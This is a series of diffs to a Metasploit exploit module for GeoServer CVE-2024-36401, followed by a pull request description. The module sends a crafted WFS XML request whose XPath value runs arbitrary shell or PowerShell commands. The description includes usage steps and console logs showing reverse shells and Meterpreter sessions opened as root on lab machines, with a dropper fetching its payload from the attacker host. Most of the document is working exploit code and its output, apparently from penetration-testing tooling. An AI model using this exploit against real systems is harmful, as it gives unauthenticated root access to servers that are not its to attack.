+end

--- a/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
+++ b/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
           It is designed to be a flexible, efficient solution for distributing geospatial data
           from a variety of sources such as Geographic Information System (GIS) databases,
           web-based data, and personal datasets.
-          In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer,
+          In the GeoServer versions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1,
           multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users
           through specially crafted input against a default GeoServer installation due to unsafely
           evaluating property names as XPath expressions.
@@ -39,8 +39,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://attackerkb.com/topics/xxxxx/cve-2024-36401']
         ],
         'DisclosureDate' => '2024-07-01',
-        'Platform' => ['unix', 'linux', 'win'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64],
         'Privileged' => true,
         'Targets' => [
           [
@@ -58,36 +58,12 @@ class MetasploitModule < Msf::Exploit::Remote
             'Linux Dropper',
             {
               'Platform' => ['linux'],
-              'Arch' => [ARCH_X86, ARCH_X64],
+              'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64],
               'Type' => :linux_dropper,
               'Linemax' => 16384,
               'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],
               'DefaultOptions' => {
                 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
-              }
-            }
-          ],
-          [
-            'Windows Command',
-            {
-              'Platform' => ['win'],
-              'Arch' => ARCH_CMD,
-              'Type' => :windows_cmd,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'
-              }
-            }
-          ],
-          [
-            'Windows Dropper',
-            {
-              'Platform' => ['win'],
-              'Arch' => [ARCH_X64, ARCH_X86],
-              'Type' => :windows_dropper,
-              'Linemax' => 16384,
-              'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],
-              'DefaultOptions' => {
-                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
               }
             }
           ]
@@ -115,6 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Trying to detect if target is running a vulnerable version of GeoServer.')
     res = send_request_cgi!({
       'uri' => normalize_uri(target_uri.path, 'geoserver', 'web', 'wicket', 'bookmarkable', 'org.geoserver.web.AboutGeoServerPage'),
+      'keep_cookies' => true,
       'method' => 'GET'
     })
     return nil unless res && res.code == 200 && res.body.include?('GeoServer Version')
@@ -128,11 +105,13 @@ class MetasploitModule < Msf::Exploit::Remote
     nil
   end
 
-  def get_featuretype
+  def get_valid_featuretype
+    allowed_feature_types = ['sf:archsites', 'sf:bugsites', 'sf:restricted', 'sf:roads', 'sf:streams', 'ne:boundary_lines', 'ne:coastlines', 'ne:countries', 'ne:disputed_areas', 'ne:populated_places']
     res = send_request_cgi!({
       'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),
       'method' => 'GET',
       'ctype' => 'application/xml',
+      'keep_cookies' => true,
       'vars_get' => {
         'request' => 'ListStoredQueries',
         'service' => 'wfs'
@@ -144,29 +123,33 @@ class MetasploitModule < Msf::Exploit::Remote
     unless xml.blank?
       xml.remove_namespaces!
       # get all the FeatureTypes and store them in an array of strings
-      feature_types = xml.xpath('//ReturnFeatureType')
-      # select random a featuretype and return the string value
-      return feature_types[rand(0..feature_types.length - 1)].text
+      retrieved_feature_types = xml.xpath('//ReturnFeatureType')
+      # shuffle the retrieved_feature_types array, and loop through the list of retrieved_feature_types from GeoServer.
+      # return the string value if a match is found in the allowed_feature_types array
+      retrieved_feature_types.to_a.shuffle.each do |feature_type|
+        return feature_type.text if allowed_feature_types.include?(feature_type.text)
+      end
     end
     nil
   end
 
   def create_payload(cmd)
-    # get the feature type and fail back to default if not successful
-    feature_type = get_featuretype
-    feature_type = 'sf:states' if feature_type.nil?
+    # get a valid feature type and fail back to a default if not successful
+    feature_type = get_valid_featuretype
+    feature_type = 'sf:archsites' if feature_type.nil?
 
     # create customised b64 encoded payload
     # 'Encoder' => 'cmd/base64' does not work in this particular use case
     cmd_b64 = Base64.strict_encode64(cmd)
-    payload = "sh -c echo${IFS}#{cmd_b64}|base64${IFS}-d|sh"
+    cmd = "sh -c echo${IFS}#{cmd_b64}|base64${IFS}-d|sh"
+
     return <<~EOS
       <wfs:GetPropertyValue service='WFS' version='2.0.0'
         xmlns:topp='http://www.openplans.org/topp'
         xmlns:fes='http://www.opengis.net/fes/2.0'
         xmlns:wfs='http://www.opengis.net/wfs/2.0'>
           <wfs:Query typeNames="#{feature_type}"/>
-          <wfs:valueReference>exec(java.lang.Runtime.getRuntime(), "#{payload}")</wfs:valueReference>
+          <wfs:valueReference>exec(java.lang.Runtime.getRuntime(), "#{cmd}")</wfs:valueReference>
       </wfs:GetPropertyValue>
     EOS
   end
@@ -176,6 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),
       'method' => 'POST',
       'ctype' => 'application/xml',
+      'keep_cookies' => true,
       'data' => create_payload(cmd).to_s
     })
     fail_with(Failure::PayloadFailed, 'Payload execution failed.') unless res && res.code == 400 && res.body.include?('ClassCastException')
@@ -183,8 +167,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     version_number = check_version
+
     unless version_number.nil?
-      if version_number < Rex::Version.new('2.25.1') || version_number < Rex::Version.new('2.24.3') || version_number < Rex::Version.new('2.23.5')
+      if version_number.between?(Rex::Version.new('2.25.0'), Rex::Version.new('2.25.1')) || version_number.between?(Rex::Version.new('2.24.0'), Rex::Version.new('2.24.3')) || version_number < Rex::Version.new('2.23.6')
         return CheckCode::Vulnerable("Version #{version_number}")
       else
         return CheckCode::Safe("Version #{version_number}")
@@ -197,9 +182,9 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
 
     case target['Type']
-    when :unix_cmd, :windows_cmd
+    when :unix_cmd
       execute_command(payload.encoded)
-    when :linux_dropper, :windows_dropper
+    when :linux_dropper
       # don't check the response here since the server won't respond
       # if the payload is successfully executed.
       execute_cmdstager({ linemax: target.opts['Linemax'] })

--- a/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
+++ b/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
@@ -30,15 +30,15 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
-          'Brandon Perry <bperry.volatile[at]gmail.com>', # Original Discovery
-          'Mert BENADAM' # exploit author
+          'Steve Ikeoka' # Original Discovery
         ],
         'References' => [
           ['CVE', '2024-36401'],
+          ['URL', 'https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv'],
           ['URL', 'https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401'],
           ['URL', 'https://attackerkb.com/topics/xxxxx/cve-2024-36401']
         ],
-        'DisclosureDate' => '2024-05-08',
+        'DisclosureDate' => '2024-07-01',
         'Platform' => ['unix', 'linux', 'win'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => true,
@@ -49,11 +49,8 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => ['unix', 'linux'],
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
-              'Payload' => {
-                'BadChars' => "\x24\x28\x29\x3B\x3C\x3E\x7C\x60" # > < | $ ; () unix shell metacharacters are not allowed, but even then most payloads fail
-              },
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
               }
             }
           ],
@@ -122,23 +119,54 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     return nil unless res && res.code == 200 && res.body.include?('GeoServer Version')
 
-    html = Nokogiri.HTML(res.body, nil, 'UTF-8')
-    # html identifier for Geoserver version information: <span id="version">2.23.2</span>
-    version = html.css('span[id="version"]')
-    return Rex::Version.new(version[0].text) unless version[0].nil?
+    html = res.get_html_document
+    unless html.blank?
+      # html identifier for Geoserver version information: <span id="version">2.23.2</span>
+      version = html.css('span[id="version"]')
+      return Rex::Version.new(version[0].text) unless version[0].nil?
+    end
+    nil
+  end
 
+  def get_featuretype
+    res = send_request_cgi!({
+      'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),
+      'method' => 'GET',
+      'ctype' => 'application/xml',
+      'vars_get' => {
+        'request' => 'ListStoredQueries',
+        'service' => 'wfs'
+      }
+    })
+    return nil unless res && res.code == 200 && res.body.include?('ListStoredQueriesResponse')
+
+    xml = res.get_xml_document
+    unless xml.blank?
+      xml.remove_namespaces!
+      # get all the FeatureTypes and store them in an array of strings
+      feature_types = xml.xpath('//ReturnFeatureType')
+      # select random a featuretype and return the string value
+      return feature_types[rand(0..feature_types.length - 1)].text
+    end
     nil
   end
 
   def create_payload(cmd)
-    # create payload
+    # get the feature type and fail back to default if not successful
+    feature_type = get_featuretype
+    feature_type = 'sf:states' if feature_type.nil?
+
+    # create customised b64 encoded payload
+    # 'Encoder' => 'cmd/base64' does not work in this particular use case
+    cmd_b64 = Base64.strict_encode64(cmd)
+    payload = "sh -c echo${IFS}#{cmd_b64}|base64${IFS}-d|sh"
     return <<~EOS
       <wfs:GetPropertyValue service='WFS' version='2.0.0'
         xmlns:topp='http://www.openplans.org/topp'
         xmlns:fes='http://www.opengis.net/fes/2.0'
         xmlns:wfs='http://www.opengis.net/wfs/2.0'>
-          <wfs:Query typeNames='sf:archsites'/>
-          <wfs:valueReference>exec(java.lang.Runtime.getRuntime(), "#{cmd}")</wfs:valueReference>
+          <wfs:Query typeNames="#{feature_type}"/>
+          <wfs:valueReference>exec(java.lang.Runtime.getRuntime(), "#{payload}")</wfs:valueReference>
       </wfs:GetPropertyValue>
     EOS
   end
@@ -170,12 +198,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target['Type']
     when :unix_cmd, :windows_cmd
-      # print_status(payload.encoded.to_s)
       execute_command(payload.encoded)
     when :linux_dropper, :windows_dropper
       # don't check the response here since the server won't respond
       # if the payload is successfully executed.
-      execute_cmdstager({ noconcat: true, linemax: target.opts['Linemax'] })
+      execute_cmdstager({ linemax: target.opts['Linemax'] })
     end
   end
 end

--- a/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
+++ b/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Linux Dropper',
             {
               'Platform' => ['linux'],
-              'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64],
+              'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],
               'Type' => :linux_dropper,
               'Linemax' => 16384,
               'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],
@@ -167,15 +167,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     version_number = check_version
+    return CheckCode::Unknown('Could not retrieve the version information.') if version_number.nil?
+    return CheckCode::Vulnerable("Version #{version_number}") if version_number.between?(Rex::Version.new('2.25.0'), Rex::Version.new('2.25.1')) || version_number.between?(Rex::Version.new('2.24.0'), Rex::Version.new('2.24.3')) || version_number < Rex::Version.new('2.23.6')
 
-    unless version_number.nil?
-      if version_number.between?(Rex::Version.new('2.25.0'), Rex::Version.new('2.25.1')) || version_number.between?(Rex::Version.new('2.24.0'), Rex::Version.new('2.24.3')) || version_number < Rex::Version.new('2.23.6')
-        return CheckCode::Vulnerable("Version #{version_number}")
-      else
-        return CheckCode::Safe("Version #{version_number}")
-      end
-    end
-    CheckCode::Unknown('Could not retrieve the version information.')
+    CheckCode::Safe("Version #{version_number}")
   end
 
   def exploit

--- a/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
+++ b/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
@@ -30,6 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'jheysel-r7', # MSF module Windows support
           'Steve Ikeoka' # Discovery
         ],
         'References' => [
@@ -66,7 +67,18 @@ class MetasploitModule < Msf::Exploit::Remote
                 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
               }
             }
-          ]
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => ['Windows'],
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
         ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
@@ -138,10 +150,16 @@ class MetasploitModule < Msf::Exploit::Remote
     feature_type = get_valid_featuretype
     feature_type = 'sf:archsites' if feature_type.nil?
 
-    # create customised b64 encoded payload
-    # 'Encoder' => 'cmd/base64' does not work in this particular use case
-    cmd_b64 = Base64.strict_encode64(cmd)
-    cmd = "sh -c echo${IFS}#{cmd_b64}|base64${IFS}-d|sh"
+    case target['Type']
+    when :unix_cmd || :linux_dropper
+      # create customised b64 encoded payload
+      # 'Encoder' => 'cmd/base64' does not work in this particular use case
+      cmd_b64 = Base64.strict_encode64(cmd)
+      cmd = "sh -c echo${IFS}#{cmd_b64}|base64${IFS}-d|sh"
+    when :win_cmd
+      enc_cmd = Base64.strict_encode64("cmd /C --% #{payload.encoded}".encode('UTF-16LE'))
+      cmd = "powershell.exe -e #{enc_cmd}"
+    end
 
     return <<~EOS
       <wfs:GetPropertyValue service='WFS' version='2.0.0'
@@ -177,7 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
 
     case target['Type']
-    when :unix_cmd
+    when :unix_cmd, :win_cmd
       execute_command(payload.encoded)
     when :linux_dropper
       # don't check the response here since the server won't respond

--- a/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
+++ b/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
@@ -50,9 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => ['unix', 'linux'],
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash'
-              }
+              # Tested with cmd/unix/reverse_bash
             }
           ],
           [
@@ -63,9 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Type' => :linux_dropper,
               'Linemax' => 16384,
               'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],
-              'DefaultOptions' => {
-                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
-              }
+              # Tested with linux/x64/meterpreter_reverse_tcp
             }
           ],
           [
@@ -74,9 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => ['Windows'],
               'Arch' => ARCH_CMD,
               'Type' => :win_cmd,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
-              }
+              # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
             }
           ],
         ],
@@ -178,7 +172,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'ctype' => 'application/xml',
       'keep_cookies' => true,
-      'data' => create_payload(cmd).to_s
+      'data' => create_payload(cmd)
     })
     fail_with(Failure::PayloadFailed, 'Payload execution failed.') unless res && res.code == 400 && res.body.include?('ClassCastException')
   end
@@ -186,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     version_number = check_version
     return CheckCode::Unknown('Could not retrieve the version information.') if version_number.nil?
-    return CheckCode::Vulnerable("Version #{version_number}") if version_number.between?(Rex::Version.new('2.25.0'), Rex::Version.new('2.25.1')) || version_number.between?(Rex::Version.new('2.24.0'), Rex::Version.new('2.24.3')) || version_number < Rex::Version.new('2.23.6')
+    return CheckCode::Appears("Version #{version_number}") if version_number.between?(Rex::Version.new('2.25.0'), Rex::Version.new('2.25.1')) || version_number.between?(Rex::Version.new('2.24.0'), Rex::Version.new('2.24.3')) || version_number < Rex::Version.new('2.23.6')
 
     CheckCode::Safe("Version #{version_number}")
   end


### PR DESCRIPTION
GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets.

In the GeoServer versions prior to `2.23.6`, between version `2.24.0` and `2.24.3` and in version `2.25.0`, `2.25.1`, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as `XPath` expressions.
An attacker can abuse this by sending a POST request with a malicious xpath expression to execute arbitrary commands as root on the system.

The following GeoServer releases are tested:

**Osgeo.org Docker releases with Tomcat**
* docker.osgeo.org/geoserver 2.25.0
* docker.osgeo.org/geoserver 2.24.2
* docker.osgeo.org/geoserver 2.23.2
* docker.osgeo.org/geoserver 2.23.0
* docker.osgeo.org/geoserver 2.21.1

**Vulhub Docker releases with Jetty**
* vulhub/geoserver 2.23.2
* vulhub/geoserver 2.22.1

**Linux binary installs with Jetty**
* geoserver 2.23.5 on x64 Ubuntu 22.04
* geoserver 2.23.5 on Raspberry PI-4 ARM64 Kali Linux 2024.4

## Installation steps to install the GeoServer web application 
* Follow these [installation steps](https://docs.geoserver.org/latest/en/user/installation/linux.html) for platform-independent Linux binary.
* Follow these [installation steps](https://docs.geoserver.org/latest/en/user/installation/docker.html) for osgeo.org/geoserver docker images.
* Use the docker-compose.yaml config file below to pull the vulhub geoserver docker images
```yaml
version: '3'
services:
 web:
   image: vulhub/geoserver:2.23.2
   ports:
    - "8080:8080"
    - "5005:5005"
```
*  Pull and install the docker image with `docker compose up -d`
* You should now be able to access the GeoServer web application via `http://your_ip:8080/geoserver`.

You are ready to test the module.

## Verification Steps

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/geoserver_unauth_rce_cve_2024_36401`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ]  `set lhost <attacker-ip>`
- [ ] `set target <0=Unix Command, 1=Linux Dropper>`
- [ ] `exploit`
- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings

```msf
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > info

       Name: Geoserver unauthenticated Remote Code Execution
     Module: exploit/multi/http/geoserver_unauth_rce_cve_2024_36401
   Platform: Unix, Linux
       Arch: cmd, x86, x64, aarch64, armle
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2024-07-01

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Steve Ikeoka

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Unix Command
      1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                        cs/using-metasploit.html
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The URI path of the OpenMediaVault web application
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
                                       local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.

Payload information:

Description:
  GeoServer is an open-source software server written in Java that provides
  the ability to view, edit, and share geospatial data.
  It is designed to be a flexible, efficient solution for distributing geospatial data
  from a variety of sources such as Geographic Information System (GIS) databases,
  web-based data, and personal datasets.
  In the GeoServer versions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1,
  multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users
  through specially crafted input against a default GeoServer installation due to unsafely
  evaluating property names as XPath expressions.
  An attacker can abuse this by sending a POST request with a malicious xpath expression
  to execute arbitrary commands as root on the system.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2024-36401
  https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
  https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
  https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401


View the full module info with the info -d command.
```
## Scenarios
###  GeoServer 2.23.5 on x64 Ubuntu 22.04 - cmd/unix/reverse_bash
```msf
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401)  > set rhosts 192.168.201.86
rhosts => 192.168.201.86
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401)  > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.5
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 7 opened (192.168.201.8:4444 -> 192.168.201.86:54072) at 2024-07-11 16:09:30 +0000

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux cuckoo 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
pwd
/usr/share/geoserver
exit
```
###  GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - cmd/unix/reverse_bash
```msf
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 0
target => 0
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.10
rhosts => 192.168.201.10
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.5
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 8 opened (192.168.201.8:4444 -> 192.168.201.10:50292) at 2024-07-11 16:15:31 +0000

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-11) aarch64 GNU/Linux
pwd
/usr/share/geoserver
exit
```
###  GeoServer 2.23.2 on vulhub docker image - cmd/unix/reverse_bash
```msf
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 0
target => 0
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.42
rhosts => 192.168.201.10
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.2
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 9 opened (192.168.201.8:4444 -> 192.168.201.42:60290) at 2024-07-11 18:42:08 +0000

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux e3f986905bde 6.6.32-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Jun 13 14:14:43 UTC 2024 x86_64 GNU/Linux
pwd
/mnt/geoserver
```
###  GeoServer 2.23.2 on vulhub docker image - linux/x64/meterpreter_reverse_tcp
```msf
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
target => 1
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set srvport 1981
srvport => 1981
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.2
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.8:1981/FEflDEJ
[*] Client 192.168.201.42 (curl/7.74.0) requested /FEflDEJ
[*] Sending payload to 192.168.201.42 (curl/7.74.0)
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 10 opened (192.168.201.8:4444 -> 192.168.201.42:60353) at 2024-07-11 18:48:02 +0000
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.21.0.2
OS           : Debian 11.3 (Linux 6.6.32-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/mnt/geoserver
meterpreter >
```
###  GeoServer 2.25.0 on osgeo.org/geoserver docker image - linux/x64/meterpreter_reverse_tcp
```msf
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
target => 1
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.25.0
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.8:1981/CEkJIBo
[*] Client 192.168.201.42 (curl/7.81.0) requested /CEkJIBo
[*] Sending payload to 192.168.201.42 (curl/7.81.0)
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 11 opened (192.168.201.8:4444 -> 192.168.201.42:61350) at 2024-07-11 20:46:14 +0000
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 22.04 (Linux 6.6.32-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/opt
meterpreter >
```
###  GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - linux/aarch64/meterpreter_reverse_tcp
```msf
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
target => 1
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/aarch64/meterpreter_reverse_tcp
payload => linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.10
rhosts => 192.168.201.10
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.5
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.8:1981/680jWmUv1qm
[*] Client 192.168.201.10 (curl/8.5.0) requested /680jWmUv1qm
[*] Sending payload to 192.168.201.10 (curl/8.5.0)
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Meterpreter session 12 opened (192.168.201.8:4444 -> 192.168.201.10:60692) at 2024-07-11 21:04:34 +0000
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.10
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/usr/share/geoserver
meterpreter >
```
## Limitations
No limitations.